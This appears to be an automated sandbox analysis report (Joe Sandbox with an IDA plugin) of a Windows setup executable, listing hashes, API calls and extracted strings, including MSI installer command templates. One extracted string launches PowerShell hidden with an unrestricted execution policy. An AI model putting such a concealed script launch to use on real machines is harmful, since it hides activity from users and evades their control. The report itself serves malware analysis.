                                                                                                                                                                              • Opcode Fuzzy Hash: eaa260a03971f233b20860b01f24c1ae51ee5d10b08c2ca185e3529b46a6f4dd
                                                                                                                                                                              • Instruction Fuzzy Hash: DDE092702057508FC330AF69D9543427BE4AF04310F108E6DE446E3690EBB1E488CB71
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetVersionExW.KERNEL32 ref: 00D79808
                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 00D79853
                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000011), ref: 00D79867
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Version$FeaturePresentProcessor
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1871528217-0
                                                                                                                                                                              • Opcode ID: 19008f2b79463e290309f60cad83677e3b191b2e6f43376b2940e002e461fec9
                                                                                                                                                                              • Instruction ID: b3f60175c6f272452424afcc1d49cf0cef8ec1ba282ae1203d220ee9acc8f020
                                                                                                                                                                              • Opcode Fuzzy Hash: 19008f2b79463e290309f60cad83677e3b191b2e6f43376b2940e002e461fec9
                                                                                                                                                                              • Instruction Fuzzy Hash: 0D613B72B006204FE318CF2D8C916AABBD5DBCA341F05463FE49AD7291E678D509CBB1
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindow.USER32(00000004), ref: 00BC010E
                                                                                                                                                                              • GetWindowLongW.USER32(00000004,000000FC), ref: 00BC0127
                                                                                                                                                                              • SetWindowLongW.USER32(00000004,000000FC,?), ref: 00BC0139
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 847901565-0
                                                                                                                                                                              • Opcode ID: 230d271388d9746dfa520800be796a43dbcbf41bdd6ca60ea2a566677156e2f4
                                                                                                                                                                              • Instruction ID: 745eb3b07e11ba3e99790a22dd482b55ebada79bf8baaf8c42cd15d0e1af4625
                                                                                                                                                                              • Opcode Fuzzy Hash: 230d271388d9746dfa520800be796a43dbcbf41bdd6ca60ea2a566677156e2f4
                                                                                                                                                                              • Instruction Fuzzy Hash: EE4168B0600602EFDB10DF65C908B5AFBE4FF05314F14426DE524EBA91DBB6E924CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00D850DB
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D850E5
                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,?), ref: 00D850F2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,02141699,00000001,00000000,?,00000000,00DA7BF0,000000FF,?,00BAA10C,02141699,?,?,*.*,?), ref: 00BAA18B
                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,00BAA10C,02141699,?,?,*.*,?,00000000,00DA82C0,000000FF,?,00BAA2B0,?,?,*.*), ref: 00BAA196
                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,00BAA10C,02141699,?,?,*.*,?,00000000,00DA82C0,000000FF,?,00BAA2B0,?,?), ref: 00BAA1A4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Resource$LoadLockSizeof
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2853612939-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowLongW.USER32(0000001B,000000FC), ref: 00BB8C59
                                                                                                                                                                              • SetWindowLongW.USER32(0000001B,000000FC,?), ref: 00BB8C67
                                                                                                                                                                              • DestroyWindow.USER32(0000001B), ref: 00BB8C93
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$Destroy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3055081903-0
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: ) AND ( $Show$gfff
                                                                                                                                                                              • API String ID: 0-344708357
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLocalTime.KERNEL32(?,02141699), ref: 00D002EE
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              Strings
                                                                                                                                                                              • %04d-%02d-%02d %02d-%02d-%02d, xrefs: 00D00330
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$HeapLocalProcessTime
                                                                                                                                                                              • String ID: %04d-%02d-%02d %02d-%02d-%02d
                                                                                                                                                                              • API String ID: 219929307-3768011868
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,0000102B,00000000,00000001), ref: 00BD0DAB
                                                                                                                                                                              • SendMessageW.USER32(?,0000102B,?,-00000002), ref: 00BD0F95
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,02141699,?,00000000), ref: 00CCEFDB
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00CCEFE5
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateErrorFormatHeapLastMessage
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4114510652-0
                                                                                                                                                                              • Opcode ID: 6b61380a3323cfe0d59331337fdc1a777e48cb685eb015fe4a721dc3e81cd186
                                                                                                                                                                              • Instruction ID: 6a2f4bb5317112ed13914a26655740a21b563eb2db8ae8324c6afa6ce4f3867f
                                                                                                                                                                              • Opcode Fuzzy Hash: 6b61380a3323cfe0d59331337fdc1a777e48cb685eb015fe4a721dc3e81cd186
                                                                                                                                                                              • Instruction Fuzzy Hash: E0411172A042149FEB10CFA9C805BAEF7F8EB45B14F14426EE815E7381E7B65A00C7A0
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2f5317e98c71c45bdf4de60b76ad016faef7f8577bd4b5bb4b72c80e4f47aa84
                                                                                                                                                                              • Instruction ID: 314843d529adf4742e946f922dbc9a9944f0ad78116f6b524c70a906bb6bd3c0
                                                                                                                                                                              • Opcode Fuzzy Hash: 2f5317e98c71c45bdf4de60b76ad016faef7f8577bd4b5bb4b72c80e4f47aa84
                                                                                                                                                                              • Instruction Fuzzy Hash: 3E41AD309016899FDF24DFA9C956BEDB3B4EF04320F50826DE825A72D1DB70AE44CB50
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000FC), ref: 00C1780F
                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000FC,?), ref: 00C1781D
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LongWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1378638983-0
                                                                                                                                                                              • Opcode ID: ae784db7f1164126655b88bf7c655ae23bb32066895bf71fff218fadbfdae276
                                                                                                                                                                              • Instruction ID: 3ebd542b78d2e2ce3992622f8d4dc36da804d62a573508de13b30a0f27c8c996
                                                                                                                                                                              • Opcode Fuzzy Hash: ae784db7f1164126655b88bf7c655ae23bb32066895bf71fff218fadbfdae276
                                                                                                                                                                              • Instruction Fuzzy Hash: 8F31AC71904205EFCB10DF69CA44B89FBB4FB05320F20836AE824A76E0D771AA54CBE0
                                                                                                                                                                              APIs
                                                                                                                                                                              • __set_se_translator.LIBVCRUNTIME ref: 00BDEF35
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0012AD60), ref: 00BDEF4B
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterUnhandled__set_se_translator
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2480343447-0
                                                                                                                                                                              • Opcode ID: 560d03ab789c3feb830e03c56699f3788fa101792f05cebf973c06c7941e6959
                                                                                                                                                                              • Instruction ID: 14a095b4de73d5d4a67e9e2a5cc3c3fe219450b8e3f791f7546dc29f0568528a
                                                                                                                                                                              • Opcode Fuzzy Hash: 560d03ab789c3feb830e03c56699f3788fa101792f05cebf973c06c7941e6959
                                                                                                                                                                              • Instruction Fuzzy Hash: B0D012649493845EE711A721DC0EB167FE0676B709F0805A9D45611693E7B56C4C8723
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionRaise__floor_pentium4
                                                                                                                                                                              • String ID: unordered_map/set too long
                                                                                                                                                                              • API String ID: 996205981-306623848
                                                                                                                                                                              • Opcode ID: eab168fe631ea12d0bb3c26a85cdfd24976d71c7a1a3159b3ba3bf043f31c3f2
                                                                                                                                                                              • Instruction ID: 959b15a1cb7f91070c23456eb8727b2f4fa16974bc246cbdb2994be70dcf7c8b
                                                                                                                                                                              • Opcode Fuzzy Hash: eab168fe631ea12d0bb3c26a85cdfd24976d71c7a1a3159b3ba3bf043f31c3f2
                                                                                                                                                                              • Instruction Fuzzy Hash: 8B12C271A002099FCB15DF69C881AADF7F5FF49310F24826AE815AB391D730ED55CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • NtdllDefWindowProc_W.NTDLL(?,-00002000,?,?,00BC7B87,?,?,?,?,?,?,?,?,00BC79F8,?,?), ref: 00BC9480
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: NtdllProc_Window
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4255912815-0
                                                                                                                                                                              • Opcode ID: 7a42c233e1db03f1b22b302c5339127f3b6161caf7bf00804393800fcb0350d4
                                                                                                                                                                              • Instruction ID: 4a9da96e75ba5e7cdc85a073a9cd4aeedc483f2dc17c25361a651965fe8a14f8
                                                                                                                                                                              • Opcode Fuzzy Hash: 7a42c233e1db03f1b22b302c5339127f3b6161caf7bf00804393800fcb0350d4
                                                                                                                                                                              • Instruction Fuzzy Hash: D5F05E30004141DEF7298B54C89CF69B7EAFB59316F4945EAE058C6661D6358D46DF10
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: \
                                                                                                                                                                              • API String ID: 0-542105448
                                                                                                                                                                              • Opcode ID: 2afe3519ef96bbb1b15e98c8d9df4b9c212f224972177faa805f8b5a319ff55a
                                                                                                                                                                              • Instruction ID: 9738199fa06fef3b04f25d35a0d0be44d8909016b05e7a82227b32f8def91c8f
                                                                                                                                                                              • Opcode Fuzzy Hash: 2afe3519ef96bbb1b15e98c8d9df4b9c212f224972177faa805f8b5a319ff55a
                                                                                                                                                                              • Instruction Fuzzy Hash: 80F06D32A11324EFCF26CB4CC805A99B3ECEB4AB61F115096F509EB254C2B1EE40C7E5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 80065d94ab8f885320a65f4d62d2493f4ebb349b1a266538e0657c3955fe56e3
                                                                                                                                                                              • Instruction ID: 4310b22a60948e7cb937a6e08f3bdca77752f7eab8d961454570928078fa1332
                                                                                                                                                                              • Opcode Fuzzy Hash: 80065d94ab8f885320a65f4d62d2493f4ebb349b1a266538e0657c3955fe56e3
                                                                                                                                                                              • Instruction Fuzzy Hash: 7C1100B1905208DFC740CF58C544789BBF4FB09328F2086AEE8189B381D3769A0ACF80
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                                                                                              • Instruction ID: 55039705ce78f9f4c59ca58816b998b6e8b4fd138b36a5c6f8b305b73f68d1b5
                                                                                                                                                                              • Opcode Fuzzy Hash: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                                                                                              • Instruction Fuzzy Hash: 56E0EC72A11238EBCF25DBDCCA4499AF3ECEB49B50B15449AF505D3251C670DE40C7E2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 73c49dcd6a38a6f9d983d59ebea3246ec313382ecab39c60e3469a3ba83b9cc2
                                                                                                                                                                              • Instruction ID: f4dc1c429b8620766c779f902f18b856ac948548f465c5a3dc565a18f37b5255
                                                                                                                                                                              • Opcode Fuzzy Hash: 73c49dcd6a38a6f9d983d59ebea3246ec313382ecab39c60e3469a3ba83b9cc2
                                                                                                                                                                              • Instruction Fuzzy Hash: 4CC08C342009008ACE6AE92492713A83354E3D6B92F8804CED4060B752C61EDC82D731
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetActiveWindow.USER32 ref: 00CDBB81
                                                                                                                                                                              • GetForegroundWindow.USER32(?,00CE41E9), ref: 00CDBB91
                                                                                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 00CDBBCB
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              • OutputDebugStringW.KERNEL32(?,02141699,?,?,?,000000FF,?,00CE41E9,?), ref: 00CDBC1F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ForegroundInit_thread_footer$ActiveDebugHeapOutputProcessString
                                                                                                                                                                              • String ID: "%s" TRANSFORMS="%s;%s" AI_INST_MAJORUPGRADE=1 AI_NEWINST=1 $ "%s" TRANSFORMS="%s;%s;%s" AI_INST_MAJORUPGRADE=1 AI_NEWINST=1 $ "%s" TRANSFORMS="%s;%s;%s" AI_INST_PRODCODES=%s AI_INTANCE_LOCATION="%s" AI_INST_MAJORUPGRADE=1 $ %s $ /x %s $ AI_INST_PRODCODES=%s AI_INTANCE_LOCATION="%s" AI_INST_MAJORUPGRADE=1 $ MSINEWINSTANCE=1 $ REINSTALL=ALL REINSTALLMODE=vomus $ TRANSFORMS="%s" AI_INST_MAJORUPGRADE=1$ TRANSFORMS=":%s.mst;%s" MSINEWINSTANCE=1 $ TRANSFORMS=:%s.mst MSINEWINSTANCE=1 $,j$.msi$.mst$inst$majorupgrade-content.mst
                                                                                                                                                                              • API String ID: 1401059542-1006386134
                                                                                                                                                                              • Opcode ID: f60b40eb15960a395360afbb68b45fe766c8c52380f51477ceb71022fd35fa27
                                                                                                                                                                              • Instruction ID: f50b1925374747ee1357ee3e905c675f485f6b35f40fdde3f0a3e9e58f7c4734
                                                                                                                                                                              • Opcode Fuzzy Hash: f60b40eb15960a395360afbb68b45fe766c8c52380f51477ceb71022fd35fa27
                                                                                                                                                                              • Instruction Fuzzy Hash: 90612475A00205DFDB14DF69C8057AEBBF4EF45320F1582AEE925A7391EB309E05CBA0
                                                                                                                                                                              Strings
                                                                                                                                                                              • powershell.exe -NonInteractive -NoLogo -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command "$host.UI.RawUI.BufferSize = new, xrefs: 00D06F0F
                                                                                                                                                                              • Unable to retrieve PowerShell output from file: , xrefs: 00D0710E
                                                                                                                                                                              • Unable to get a temp file for script output, temp path: , xrefs: 00D06EBF
                                                                                                                                                                              • txt, xrefs: 00D06E83
                                                                                                                                                                              • ps1, xrefs: 00D06E56, 00D06E68, 00D06E72
                                                                                                                                                                              • Unable to find file , xrefs: 00D06DE3
                                                                                                                                                                              • Unable to create process: , xrefs: 00D06FB4
                                                                                                                                                                              • Unable to retrieve exit code from process., xrefs: 00D07131
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Unable to create process: $Unable to find file $Unable to get a temp file for script output, temp path: $Unable to retrieve PowerShell output from file: $Unable to retrieve exit code from process.$powershell.exe -NonInteractive -NoLogo -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command "$host.UI.RawUI.BufferSize = new$ps1$txt
                                                                                                                                                                              • API String ID: 0-4129021124
                                                                                                                                                                              • Opcode ID: eece98acb44d0108538568d2fc0b2642d2edd8a67124e45cc429edad752ad1db
                                                                                                                                                                              • Instruction ID: 513d7c94e0a202178d783b4d82a8be84c9147ef2bff79b7843d6377a028d5d0b
                                                                                                                                                                              • Opcode Fuzzy Hash: eece98acb44d0108538568d2fc0b2642d2edd8a67124e45cc429edad752ad1db
                                                                                                                                                                              • Instruction Fuzzy Hash: 47C1AC71D04609EFDB10DFA8CD05BAEBBF4EF09310F248259E514AB2D1DB75AA44CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00EA47AC,02141699,00000000), ref: 00CD56A3
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA47AC,02141699), ref: 00CD56B8
                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00CD56C5
                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00CD56D3
                                                                                                                                                                              • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 00CD576D
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00CD5774
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD5788
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,?,?,?,00000000), ref: 00CD59BE
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA47AC,?,00000000), ref: 00CD5AFC
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSection$Current$AddressEnterHandleInit_thread_footerInitializeLeaveLibraryLoadModuleProcProcessThread
                                                                                                                                                                              • String ID: *** Stack Trace (x86) ***$ v$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
                                                                                                                                                                              • API String ID: 1326996155-981128330
                                                                                                                                                                              • Opcode ID: 245108adbdce9602e360090e5ac50b1222618ce2f6ca46a83176a765f4310db5
                                                                                                                                                                              • Instruction ID: 298ba919e28df6baeac5ffd37427e7825cde84ef86fcb0f9f26072e6b54e329a
                                                                                                                                                                              • Opcode Fuzzy Hash: 245108adbdce9602e360090e5ac50b1222618ce2f6ca46a83176a765f4310db5
                                                                                                                                                                              • Instruction Fuzzy Hash: 2EF100719006589FDB24DF24CC88BAEBBB5EF45300F2042EAE519A7391EB745B85CF60
                                                                                                                                                                              APIs
                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00EA47AC,02141699,00000000), ref: 00CD56A3
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00EA47AC,02141699), ref: 00CD56B8
                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00CD56C5
                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00CD56D3
                                                                                                                                                                              • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 00CD576D
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00CD5774
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD5788
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,?,?,?,00000000), ref: 00CD59BE
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00EA47AC,?,00000000), ref: 00CD5AFC
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
